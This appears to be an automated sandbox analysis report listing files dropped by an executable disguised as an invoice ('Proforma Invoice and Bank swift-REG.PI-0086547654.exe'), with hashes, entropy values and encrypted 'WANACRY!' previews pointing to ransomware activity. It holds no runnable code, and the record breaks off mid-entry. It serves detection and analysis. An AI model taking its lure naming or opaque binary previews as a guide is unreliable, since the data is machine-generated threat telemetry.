                                                          MD5:D49713A33F39A27C8AF9E991C4F68321
                                                          SHA1:4BAB4C5523BAA2866F3024BA265367CDD7F161E8
                                                          SHA-256:C137002B29C1E50A431C84AF5947E74EECEDAE1F5CBA2580564EA8CF88E10633
                                                          SHA-512:81153825DBFEB790429176073AD32C78E39675A850338FDAE3B18B58CF78FCD20EAECB78C353291266FB9F16E8B4CA86E33032CBBA0C42A16A17A5E44968B92D
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....m.......v...\.3.....KO.....Q.t.....u.Ld+..n........<.I.xU......Kb.......e....A.R.,.D!..P.......dIH42...>....@P.~/.,...&.F.d4.<q.3.;..V...o.C.I..(TD.j.......;.o..}..@2z.-4.4.X*......=.h.0Y.]..PW..@.6A.wERWY..M.....wC.$h..^..i.qE...`@..aXU.k.k..)L..............j....9Pf.~.W..6..+W.m.^4.v].
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1048856
                                                          Entropy (8bit):7.999811213678692
                                                          Encrypted:true
                                                          SSDEEP:24576:GaMjTvLOskGEjQQKbj32Wx3EIX9b9XbG8CnZbBVsMiJWfBtR:yvDOskGEkQwf3EObsbPB757
                                                          MD5:40BB7702925988B2A16D94D415D09520
                                                          SHA1:0DA19AC7A13B76E3793F4D22B3AC2E44D013EC96
                                                          SHA-256:BF85BE469413BFBA402993560F8A30E741DC666837D0DF31424EC6319B45152B
                                                          SHA-512:C3465129A2B6A4151C14D4AC43FAA8C2491525CE57CC227083FC3DEFEF855FE7F74E630E07D8BC0EBD7CBCE448D740B1DEACF578CCD176C4B0E4DA0955617B80
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!......g7MK.4l..w.q.U..6....1....3..O.J........8..-.*........4".9b.F.%.x.=/.....V.a........,O[a..B.S...<...L6>..s../\L.Y,=)....E..<$GZ.r..(..._..... ...._c...:.....Jea....l..<..h-..b(.j.....o.Y.K.N..._.|..f.*.1...w.:...P2...dJ.w...{...HP...Q.[Y.n...v.................:hR.M=q._.3..W..1P.A..tg..R.>..T...........V.....?.S.d..a.QPk}..+7..@..y..i..&K.%..-..n.;(....<S..T..%....c.$..N`..Z........v.7..a'a......3..f..a/.n...{6o...6rX[...l.%.I_...p:..|U....l0.U.K.i.iX..._6K......0..~.B.Hi...AVHe...i.I.<..l.....&(.....p......tg..@....T./H.}....y.....?>..A..M?}.Mm=>....j....Z.2.%.....t8.#.-16.i..c....M.cXf..ti......?.....I..pn.s<>..K....RuqJ.d...t..&..d.i..K.<H....3e.%...J..f~.......)...%}..!+.a.L.7.:....../.m...[Y.j/....YQg....~..S.w....?..}4.....1IA.b..&../l...}|..o.S..2.U.Y..o.`.....P.T^.O.g8..............Z...39.w]k.Y..x.U.6....5f..&=..:)..i$..f..EU&.......Q.a....m;.....s[Z.r<...H.4J.8.....M....C..._U..We.0...B...=.LL. ..k..).."M..k4
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1048856
                                                          Entropy (8bit):7.999828936303695
                                                          Encrypted:true
                                                          SSDEEP:24576:i+qCimD7b0/JTExSgaFELTIqk9dGTTVL5kqYfZS:UCie7b0Kozqk9M/jBb
                                                          MD5:92C4922595FCEB09E9D43E9C8A29610F
                                                          SHA1:2BDC2DF34E3D283E71F5F36E4059CA29C9397C13
                                                          SHA-256:726CC680AFE039DD73115F3AC417938BA5CDBAC12DA8CCCF424218C0EF96E371
                                                          SHA-512:D5C37CE3362768905A1FDA5BCE84C3D3544BBB7100048218FF34A417FED6C0459F1C8923680D7E9DF0E964517B448EB78918FA15107A63E724752DDA0982320C
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....s/..iV.....gY...*.;L{..U.UvS..x......L..R./.N..6.z...vl..C#..aN].$..V.X......F.^......E....((.#. 0.)2...\e.]...\.&...(.p."g.5r...%.#@....j..[.k../.....|....G..&c......Y........\.._v..4_.!.?.../.z...q. .N.._.w.-..g.............tz..i}K.}.Uj2[.P.............s.8.r....7..m../..$X..c..1G.<%..o.u.1`..-\.&<.$......~.....G2...t}a...`...fP......?~(7..K..'.J...J..%..z....~......Z...'.......s...m.2.fmq.X.O...W...c..n.".....5....K.S....DNt.k.O..\ ..N"....L[.x+..pg{..Y..:T7..0..u..3R.fq5..O...{...x..+G...lR..j..X@&.....}.\....r^.#.~.i..Y......&S.E..y.<.K*9.T.z`....QK.=>..^.n.Vo...Y.!d_...C.......\.*.-.{...*._...K/b......v#`...*.e........t..XFx...tD...0.`v;n._.J..{....sp...>LE8h.n8..H:W.....'SYU`w..53..6..TIc.k%.m...*.I^Vh.W...^..3....1.3.K.8.m..V..{..([.....Q...?...Y......$2...0D..o|..r..../.d..C,."g...(\.@D"5^.W.lz.....4X....n.|..{>..f.R.[L^.\.K.....4.x&...p.x..4f.2..P....Wd..cf.r..d ecF.=...pP...2....x.....,..........,.pA..... ..?g
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):312
                                                          Entropy (8bit):7.213687836159957
                                                          Encrypted:false
                                                          SSDEEP:6:bkE8sRWkDRriKcnfErGMj/KzVilsNjvflwr48+cDAc:bkE83kDfccrGMj/OViqN+4sH
                                                          MD5:1CD07CF5AEF717CC818F8CB471B101D3
                                                          SHA1:EE3FF77B5F3D45BB6F0351FCD5CE247CEA095D67
                                                          SHA-256:322513E35EB04043F1D2434036B5BBF8D40738E9A4C3D7623164E3947D8B145E
                                                          SHA-512:F53BC7EBFF44A639CA2D02E1D5A415543F2FC85B713BE787BD7C6FD76646D4D2B4AAC37EA0E9E5FDB0AD1E808C49E7CF8339282FA17539A0DD5E87C12F5AAB18
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....1.n ..[Y.V.9%..OH....z.O..C9T...].ujm....&.......?.Z......bNL.(../}a.L.........M..t....>.#}...R..A6..B.N.G..q..(.dm`..;...Z2...j.`...p..#...E...q_.(s..m5....d....O..hz7[\;_ ....LV....f7.HG.A:.......8y....../....pEc..J. J*.....jf.{.Z......6I.\.MX..............y.....( ^.5...)q.......u...\.
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):4194584
                                                          Entropy (8bit):7.999954724157412
                                                          Encrypted:true
                                                          SSDEEP:98304:6HaoVwPW6KeGiciSMj/SgYDjtVZAxVFZDgWWkN2ecR549N:ATVwN5GiF/SgYHbZezgYN2ecR2H
                                                          MD5:5E5E7D9F25E3FDBD830E851BF25858A8
                                                          SHA1:C8D40D95F771048F7AA27C9DCE0E0B2DFFB82066
                                                          SHA-256:20E31D8D639D85F9AB6D52CD7766B73B6D438A8EF7C36D8A37E439E9DF6462D7
                                                          SHA-512:DA31A76E46169D99EC469875E9A8212A9BC072829D4BE46A2ACEF0E833450FCC7488FE676603A97127E8DFE2DAD861E6D4D4B3F8039C81F817E27B1099B7E40A
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!........d....2Qa..F.s..^Q...s..o..Y.......$....c.....j.`+..|].jbfb..@..m9..nb.i.c4...5_.{./.db<..;..(>E~.J.n.Y........@.<....b...m\7.4...H..d............,....(.>..A..m.Q...IB.p98..A9.6R.`].k3.$..V.L..D.O(._h.+..=.m.......m...n.}."....=..T.0.`A`.......@......Q.k0\..=...?f....rm^....+.|..(.p..g..l..d..zo$..M.}.....-vS.\}.@.....B)..hw.=...{.n.e.].B.o.,XX..(......p*.v`au.Y..m.'.84.8.~..o]./...vb.RYWb../x).....%.....2w....YM(.y...9...,...9........G..W..u...L..G<"...1.0.s..0.....K%.4.j...N.. ..L.)6.h.#....h..M..Li.3.V|...4.....s...|.4........g-..v.f....JF...T{..fv..\......e..I>g..nCeP:...r^J...,..SQ....=Ro..1L..M|3.... ..._Q. ....2...R.Q...|..M).Us."..k.....Qs.e9.c`MslO..o..!Y.,.....2..y........IG....7.J.l.R........B?.K#.$].Gk..+......c..{..z5n..A....~..L......Be.M..I.:......\.(.......B.A+u.bX?...F..B.T.]x){..5.3...N.a.Cb....}...@.%Uk..E:kK...Q?..(...s..'i.u.j.7}.8......n..F...{1.Eb......u...=dmp.*.r{.u.\..yk$.!7..8..(.H.BoT...z.
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):312
                                                          Entropy (8bit):7.243486291426241
                                                          Encrypted:false
                                                          SSDEEP:6:bkEkOFWYF14mNKBmoTi1sRY2biOIhr6JXuVj3RlpxigWbF/e/U2eIt0xZw9bJwKc:bkEpN14mNK/u1SY2Dkr6kVlxJo/e/U2Y
                                                          MD5:603BA0C463BB43B4A2BEC4954B206497
                                                          SHA1:8DC983FA9C85578B502DFAE230779EE7A13ACDF1
                                                          SHA-256:AD38F0E3D23CD5776A854DB2BCEF53058431B7C2A384AC1FB8EFAD31910FCCFB
                                                          SHA-512:2AFE1833C51EBFFA25E389E6B91CF88B2E29DE82E2E2587780173C53586FBDE4707279288B5A33CB8EE9C14CF89B53638362A6FDC6EC5D58F471C3FAB04564F0
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....u.z.A...2`_....6l2 ....sI^$\U..ZFC'..9b.7....,.$..,.2.H'..2-*...-....cf'...OSZ2Q(.....o..7O....1..\....h...Q.W.....r..y....)k.B...{.....1W.....C2.G6x.j..~..Ey..G|=..@.....5Hw.......!4..I..H...F.>as..R..:.ZN.....E.../#l...>8.{l.).F....WZ..].>.................#7.,...`*..V..w..;.w.yO..
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):312
                                                          Entropy (8bit):7.227036544609894
                                                          Encrypted:false
                                                          SSDEEP:6:bkEKoo4dX9DwYS1P9xjJ5+Ch3nuaLozB5H3d6w7IWqyENpj6h8CcAl9TWq8:bkEQapS1PzBxndIr7CppY8CcAllWP
                                                          MD5:8C18D96D84F0D845C1EB7D79B96F4246
                                                          SHA1:8223D8B54430047627180E5A1EF52328A623CDF0
                                                          SHA-256:56D664FBD2140B94E0DD405B8FC63D400AE02CCF2A22A2A2B8CCC8792B906A51
                                                          SHA-512:1BE715C3CC6852BAD8C70E222A2FE9CECAB7E11C846EDE84E3A5D63328CC56E2CBFFD15B107E8966D26E5DC36F76C09B5B068941D1C019CC8A7FF1EED3C09B94
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!...........8C.._...4...4.]....P......TM.kv^r.........ay2.......#.Za..e..>]/.dN~..'neJ.!..}...w.no..a...g..@...."O........g.}...'..9....p+....X{W`._P....";M..6W.h...j....r[.'....:......-Fx..O...Wm?.p6..iNo....D+.5..X.^..7.W6..S.`f.*..5&..].o<.I............*K..+.L.M.-&...Op.mO.3s.J...a..
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):29512
                                                          Entropy (8bit):7.993825009319092
                                                          Encrypted:true
                                                          SSDEEP:384:FwvI0HfnGQuteleC4Hw+iYnZBhqLmnKKDlqZbpA3h28NEnBkv2R6gLNcFUkV7hzL:uTlJ48YgKN0bpu2JtcUSWVH5cV
                                                          MD5:138108BE486A0043F4D5171D127E1253
                                                          SHA1:DC8CABB401C8358C7C8198DEE74BDD99037B8E3E
                                                          SHA-256:E119481E5ABC3519269A640F9C44B527F312694725A920A5CB588C1C8C640EFE
                                                          SHA-512:3A90E4987E2CA30A5D12A4711421CFDFD7C13FD5653670AB413265C92EFDC07886E3A986DA8C87FA7FFA5F9A60C233EBC365F687533E4360F4C12BE2875EC979
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!......*v....EtU)Z..S._....C....3.}y.W.$..zn..%..;<.O..<W6v.G...V.../.6..."..v1Cc ...t..eb.<0.x...>...)......58.b1.-gDs..C....Rdx....I...j..?.'>v.I..&..5.5.#;......<:..,..*....C^...C..Y. .G...{.c.._..b..e..Q..L.C....].j.?....y...$....$U/S.<.-.]KA5%.....0r......3}~>R....x...D..#...--n.x.v.b.n......8..}.x.#..>>...?Vc.&s..F.....Q#.ic.....&...3) .C....".=.~.A.L2..*...v.Z...K.n..?..K.m.&.Q.bK.&...k<..f{%;%..3U.E=..?.H..Y.......&Q.s..S+.@.qbe..`.[....c..`...Q.?K..r5M.........H.O=...t.{. 0..|\....w......{.K7..=...W.....?,.F.[JU...l.S../z.........b.....a...%.......T.....Y..;ti..'.F"..J...!.[.........K....sG>......p5........:q..\4h...;.....y.4.-.d....}....|..k?m........O '...p.....L.Cz...u.f8p.W.Z..9.F..G.5.>j=GL.......@Y>.*6w...+.../....H...3.....^...f...a..."..Iw.."B....j..lz._co.|..X.g.r....'........b.......h.'\<d..n.;6y$...a.qNq.2.[.J..,T...".Y.<.8>...'....}ClF.5s..%)..7f>Dc.......V..v..pp..,.L.U.c.._.^..s...hc#.O.e..|......1Z.;..[...<,"d...>\.
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):312
                                                          Entropy (8bit):7.229497419706369
                                                          Encrypted:false
                                                          SSDEEP:6:bkEhFN8SCJwVjQ0U0H8Zi+65hPJwRLjkLi/687qiqHfIVeccFnXG/bKoZH:bkETNdVjhU0HhRhiNsif+hfIMccd1i
                                                          MD5:33502A9300D2F309A2B175E6B654B853
                                                          SHA1:9DB8C9793AC81839FC4DDD9533BD416471E07311
                                                          SHA-256:6BBD0364326B8547F08028B53C41BF5E6798A10C1A55C4CF7A469F52E20458C1
                                                          SHA-512:C20524DB253633AF3EDC454C33E91CA16D23208A06B08F7C087820E16290767FD0BCEA55EE002AB171F9803D411F176177CCEF6A5EE73B500CFA5E9FD7749B2F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!...... .....73.8+H.....J..E./C...Z.L...D...N.c.Yu..Q.KB..B..}5..6dp......`..........5%....d\.*...N~;..YC..V.W_.~..+k....%m..........?(.E5..i.~...5.S.P.wdC.Z.G....\..cY.V.....Op.....P.G-.l.V.xr..=.H.,.a...1 .......U...Y..E.yL...B..E......%.,...j.....&.jT.............<...KJ.{...!Q$Zc./]...-..^.
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):312
                                                          Entropy (8bit):7.189358079490809
                                                          Encrypted:false
                                                          SSDEEP:6:bkEXnaAuHj2NfBFZyL5p1pUmOyK0+Awa3Z76QJwPrtxsbQTSQw/G:bkEXnCjA4LbU2KC73Z71J8WbQTSQw+
                                                          MD5:411CF2BF6391FE04BC342B77BDC19391
                                                          SHA1:B83742E4803020C385D1513012B01E84356C9DC4
                                                          SHA-256:616A836C1C07932BBF6B1AF1F967A3DB29EBD2CB2C10811C011311223A47BD5C
                                                          SHA-512:7F67A2201668A10A41E45F939164A564A6C508438B9D8B8019D836868B3D313264C8C9C263A74948414264E9E8D80A1E94F291EAC3B460F39CD1D6FA3D8D77AE
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!...... .|qY...UEJ.V.7e..5.v.(..FbI...... Q.&.JO.y.nD.Z}<.......].n?.......{.....H.$U.M...6>.n..I..s...O..Q..*....$..RV.).O....B.;~.p'.[N........0.U.......CX-i^.....;C[w...C....q.D.8.F...l.j.K-..eY.[B.U?."..HG........5..0..3.....|...R.v..,.~>....................A&;|....lN\/...+;9V.|.o.?..
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):312
                                                          Entropy (8bit):7.1565650879686755
                                                          Encrypted:false
                                                          SSDEEP:6:bkEjXKlJw5bZmfQbLfQZLRNIHWUXMgAWkhuU3BjvRHMHpu3R8:bkETcUpbLfQpgNAWhU3TuEq
                                                          MD5:14FF6D9CE984DCE514C2D9370DBC439C
                                                          SHA1:F2425A984F9167354F0AACA45C13A16B52F8CD94
                                                          SHA-256:54F1747057BB75249174BEC2C1CFE110A1653278B30CB27C1EBAC64D804B7D83
                                                          SHA-512:DED0C6232A4275653EA94ADD242FD922C97500FE23C1BE4ACE4F311B502E59CBBD674F767B4C2C7AD78A1DF0F748AB03FE4BBB829D82A4FC5EC385F021D3AE1A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....7.m...uY..@..G...".._....&,U....K6.....f.<..t.....PA.[..f.[..D.^.{s$.U..a...77...kWx.R..)\L....C.YC..*LZ.G..7.z.X.....#Q..|bF.............s.1!z.^uRo.$....|:..s.$.!.f..*t..Q|*t.(...U:.gKX.1?-{..l....(....3GT..6d.?J.........z...g...dF...5v.lZ.................C..w...:1.1.4.1Z*.J.7.h5]
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):418488
                                                          Entropy (8bit):7.9995948692936985
                                                          Encrypted:true
                                                          SSDEEP:12288:BpY5JyYSzcDDtFb1GWZ32zpbVKfH1o9Io+No:PY5uc3h5Z32Fb1So+No
                                                          MD5:79B7DAD6553A2AC44B694922F4343EAD
                                                          SHA1:5F8BAE41000F9CD1794954AE898BE8476A16C84B
                                                          SHA-256:49976727709A4ACFAB49E65A214656EC5AFD3AA5578C31166ADC07136E5B0375
                                                          SHA-512:0BBB7AEADEDA59D5794344FA6478E0FE8614157DCB99C7F7CB7313626F046953AE02DC6CBBA942D2A1AD05212D13736D0CCC03A421435858687CD672E7CF78F4
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!...............K...S^....._.<&;....-..3....,.LE:.,.D...mru.H."5.......4:b^7..#..(.X....ge.9.&.e+..A>...f..Rj..y...}H'X....B.[.....o.....U.d..JQ.)NV.&:d@a...<....0.se hb....+.E.R...D...&..I..........<...C.{>.&..<...f.:o?....!p...u..,.....p7..8.[.....a.......F....=......u.>p...o.[C+T<.^?.k.....;f....../.....'.... 2.5.=N~X...A/f..L..Y.Q...o......gu .%c..V.Mu._o.]m-+h....a.e].z%.L.._O"r.....IW.CN._LDA.....6{....{.~&RQ..&.C>~a...L....7Ai........h..X...._-.....&.,. .+,3....e..P'...&YS.h.)`DT_.H.|...z.s...f.6...>.E~l.E..#.E.Lw.C....&..P....XH.../.o.}.y..x....P........Q..<_.w..z.^o..fIi...k((..r.....Q..)..1..6...P..>..........<.x]...!E.....~......{q..,.O.om.GS...|.o...........|]. .......qOu>".......Fz5......A.....->K.{.W..4./.I.....^*:.`k.X.....&...cZ1X.v..l..N.....5..0v.;9.h/-jeux[.9.f...z.>G..._..-.&.ud.....*.&..y..d.V..t....k....2.~B.[k..v..P..8W.[...n.....p....-...Yz..F...e..9.....b.&....%.Z.24..tR...b..........|#...B.8..E
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):416088
                                                          Entropy (8bit):7.999564613698158
                                                          Encrypted:true
                                                          SSDEEP:12288:kuqv/cCTS8XQo2M58nvHgSEA50jTwO5i6IhqCDzdfO:bqn7pMaofgSE1A0A9W
                                                          MD5:4811FF9220A36281BF0DA6A2D108B390
                                                          SHA1:24DF01794FF5695152DE4D319C1A5352A1F5DCD0
                                                          SHA-256:6CDD8CFCBD82E3C47AD2276D1B031D44C65D18E499E9E9BAFF875008BE4DB61F
                                                          SHA-512:83ADABC36629C2F2DF264D6378CD69D0D46968FA29A8D1C7EAFAED0BD500E366C924A5C6F26C45F8307CB943110DA8214B6CA1A6A262B582DE85F723886D5C7C
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....<.f.....!Z...h^@4&.....G.<.<t...1.....|.....zYq..f.H....JJHNGN......+.{v.x{.Wz..8.1...]...h5.2..M..k.J..V.z{..8.D..$.-e(..p.-.pD.AC.]......0N....#...id$F.W@.L #.....e...b?..w..H.VfFO....x..N..Q..cQ.s..=7.+r...%.../...<.<:..,........E...o..6M......2X......k..R.7....D .S..a.......$..~.0.....O1....k.1./....Jp..t.......].......w.f.9.`.h.dI..i.\=. ;=.....v.b..;H...D0Y......I....~[...o..|O.}...E).+..56...d..]D.lI..V60`.7...a....7.A........F....p...lk..S.P.g.B.f./.............Z.)....tV..Q.RA.y|."&.U'........E....W]..%M...o `.3.X...2LZz...2.....t..N1..|y.L.~[~c..qX..iQ.].qc7..iUh..:i.{....'.D..fI`....#....Z0.Hk..t8.3z..).^..N...#{Bp..;f..z....$J.UK...s.K .:.m.\.K%.ZR._6...e.k....:..A:.B;.*..=b.A.?......$#....k..=.),dqb@^..3-..a.&D.{@.F."...=....=....3.F..2%.+N..4.X.B.I..=....].._",..v.....T_qQ..$.dU6X.N..x.RN$"..U8.pA....mtZP.7.......;z.........q.>....e.x...-9.e.....=..U9a..-!...j....g...+...0..L...3...z..].:..1.O....V.q0.&..tkR@......#.'U....7.
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):296
                                                          Entropy (8bit):7.136563460364328
                                                          Encrypted:false
                                                          SSDEEP:6:bkEOH/uJ4j73F8F8szd+MGx2HnIczWo99wkS/IPtuCuVsRcaC:bkE8uJ4v3zszd+MGxoJzWoTHCOtuf6R+
                                                          MD5:B2591B8A087017D5880AA0746B240093
                                                          SHA1:3F6C2E2AC906AD89B7FC2744DD43DB2D7D7C8AB9
                                                          SHA-256:F0B51E6C5A5C198840C4BBEDA721111EA9BD1C8E8C70232A205A6BCE50B37893
                                                          SHA-512:390030C2569B65E78EF10F6E59E0F9322945939C19DD311CEA8C983B74BA7E4FF4F76E4A905B9B9DB59E367E75A9FC51947E250E0B2CDA668273149A69D98312
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....B.g...~....G2UEb..<S....)%&..'H...USd.1L..|...n.F....F.0X..../.V8[5l.,..).i.......k..[BL{..y.e...5..`.....q.~0...>.....Z..1~..CU.&.Ir.upJ..L..M....w....!&.W..........8%h.a#u......N"..!.X<.XGZ..U.8;.....%....3..W..i.......T....*%aK.V.............dPI..B.i.[.tS@=
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):296
                                                          Entropy (8bit):7.078390213915426
                                                          Encrypted:false
                                                          SSDEEP:6:bkENbQnFv/xhc0kt67iE5yJCzsl5cTGHw9uRDZw1CafPdPzO:bkEunFnKE7iI7zsjUGQ9uRFkNi
                                                          MD5:8B37D6BA25E74F63E93D428208C02C91
                                                          SHA1:5F8A84841670A78A495FDFC0061AE52895005BE9
                                                          SHA-256:284E3B70FEAD3ADBA9BC5EFDA4943540CFFD8327DC48808A58EEBA0EE35C2158
                                                          SHA-512:8D4314E3E393CC4E2E8A306840D0D5B7E414713F0AEFB20AFF2BECE293A8E2E5DAF4E00C1179247A6F0E05A086DB9E2DBD47FEE4B732B41A8B2445FCF872F50D
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!...........[.B.B..o4.M.a.%\M..%..B.M...*...*w'{........La....8.l/.{)9.h.3....h...S..6.]...{H...\y.[...p.B...Vp.F.../..b.IU...Zp.>p.'1..I.-3...f...2....P*.c.....a..C.n.~3.. .LK....."v.Y2B;P./.f%..-1;.st.y..h.{...Vh8..N.^|... !$.}w..U.7...=..^Y...'.z>.................."W..h...TG.....
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):190440
                                                          Entropy (8bit):7.999208312385713
                                                          Encrypted:true
                                                          SSDEEP:3072:XZmAl9p3C56MjCF80+lRAhJj3KP8TTRI+sdcNOkkpBglFbmBJeEMVnUs0WNy8r2K:Jm+9oS8zWhzTTRIrdcUNp22HBAUT22RU
                                                          MD5:3D1A4145E2C2B7DC7F8B2D2C16BB03F4
                                                          SHA1:637CFDA3975C0421D6F24616E3F017C77808F974
                                                          SHA-256:CB679C1CE23CD074DCFC5C3BC7119DC983E1FF16F69F9BF2AE1A7C72EF4FAC9C
                                                          SHA-512:08534C336B3CD54E2EBB085D8E823F31B38BC37FD53082AF8D3D28928A8A922D0A7CD0602FCD5A54C1C122E8CCC60DC4B2D96DA6D584D943B237CB72DBA3CF44
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.......5...q.Pg..Q.O.,..........=e.F.......o[G.....q....~D....,...D...Z.-.A......~.._.).(..;^..,.*.6.....az.A...-w.@w..Q.Mop..N.L...(..'8#..............8.{...........r.....Y..JE\..;.@..jM'n.%rV.19;......|y(.-..U...b...L.+.F{*.;.A.~DU......R.i..............(...NPa.....!h.I>.\....;....."]......2.K......S#.bX98..su....l..Q.....$Rg...9....[>..........m.\.Q3...T7.r....ee....dSXK8t?.....v.&.T..J...Q..L..B.^.........Gs.zy{.9.%....^i.U..[..v...G=...u.|D7......U.Be.V..T..)MMO....;...Va.I.2...s..... .z.`_.x..l.....N...0.$.....*;U...-.VR...F.+.!....T!/..<Xb..5@j....%f.<.+...#.J}%...`I.....P.ZE...u.....*..y...sD...?..Z<f.?.s..fE/.-qy..H..)...t[...&;...|...9...t.U..J.\.<.....P.!.}..S1zyT..vX.;.]..%.M.i...I.R"3P....v.5..&.m....F...4.Bc....&.*&k.J!...L.% I./.m,...$.=^.......'.....5.nX......v..w'2.".p...S.hF...C..=..jK......^.A....`g),... t.Y. e.Bk.JP.}..=.'..N......P.T..b|~h..;.V..bD..Kj.]0?.WT....a..z.x...=E.X....`.<...mk....Q....
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):190440
                                                          Entropy (8bit):7.999208312385713
                                                          Encrypted:true
                                                          SSDEEP:3072:XZmAl9p3C56MjCF80+lRAhJj3KP8TTRI+sdcNOkkpBglFbmBJeEMVnUs0WNy8r2K:Jm+9oS8zWhzTTRIrdcUNp22HBAUT22RU
                                                          MD5:3D1A4145E2C2B7DC7F8B2D2C16BB03F4
                                                          SHA1:637CFDA3975C0421D6F24616E3F017C77808F974
                                                          SHA-256:CB679C1CE23CD074DCFC5C3BC7119DC983E1FF16F69F9BF2AE1A7C72EF4FAC9C
                                                          SHA-512:08534C336B3CD54E2EBB085D8E823F31B38BC37FD53082AF8D3D28928A8A922D0A7CD0602FCD5A54C1C122E8CCC60DC4B2D96DA6D584D943B237CB72DBA3CF44
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):38056
                                                          Entropy (8bit):7.994575809343454
                                                          Encrypted:true
                                                          SSDEEP:768:awaEop0eQZ1Btg4XfvN/cyiMBImyKz2v6Tb2oSZchB8VRoxzRe:asop0dZ13gEfZiEImmnZ2B8VRoxde
                                                          MD5:CDF71B292AE23A49518054115605AD9B
                                                          SHA1:1004BA4F9978BA90CB05A54413E57F16414B170F
                                                          SHA-256:13EB4BD3A4F74857D34ADC6A662F6E6AF21E6EA38574F87B883DB9DEF309D979
                                                          SHA-512:6AC9793AC4076DA40959D4797B8F36A0505AB9F3D5FE0C9C943FDEE1829584A10DA82495F1D4693C631ECDF8CA370F962A11A4C9A9DFAB3680AC0B57B04FD7E8
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):36888
                                                          Entropy (8bit):7.994594501066197
                                                          Encrypted:true
                                                          SSDEEP:384:qfIxzwkqOF2tLB1wbCSMN6gOhTFqlx5YBpTJchjLnWRcFAx4xiiquxUeUgJuxE1j:1xzhvwL34/w9vJuALpc/EWOzeKvmEdR
                                                          MD5:135B8B51F31F3EB80B8FABF1F75C46B4
                                                          SHA1:E060A49C4E4583A17C592DC0F9148BC6187E8AF1
                                                          SHA-256:545ECC5A3A6AB35503117D5D625299A533FE20F32A7835E4A43008E1C052A835
                                                          SHA-512:12A9014D426E2C314629D1447E1C6C9B503B51A18F264045DFE4C2A7FE81D8373CA51D1C143C5D7EE7A24A0CCE8F280E375E11E653ED5C1A2C76C2146D00CF66
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):296
                                                          Entropy (8bit):7.087131249398959
                                                          Encrypted:false
                                                          SSDEEP:6:bkElR+iSwWJ7m24VKsFjQg1y9onvooLe/ucW+TgcYRfBsCGKh2YkKTEhmDcu+:bkE7+p7BYK3afJc1YBjH2YkKwhmDG
                                                          MD5:B093BF6E8AC299815996132B580A9E02
                                                          SHA1:14B1D3AF1BF5D0160140D6ECC6216446C40CF6B9
                                                          SHA-256:CD3C16B96ED8E044AB65C0258E6F60B11B55A6632EBF76E935C54CDEEE0D4B76
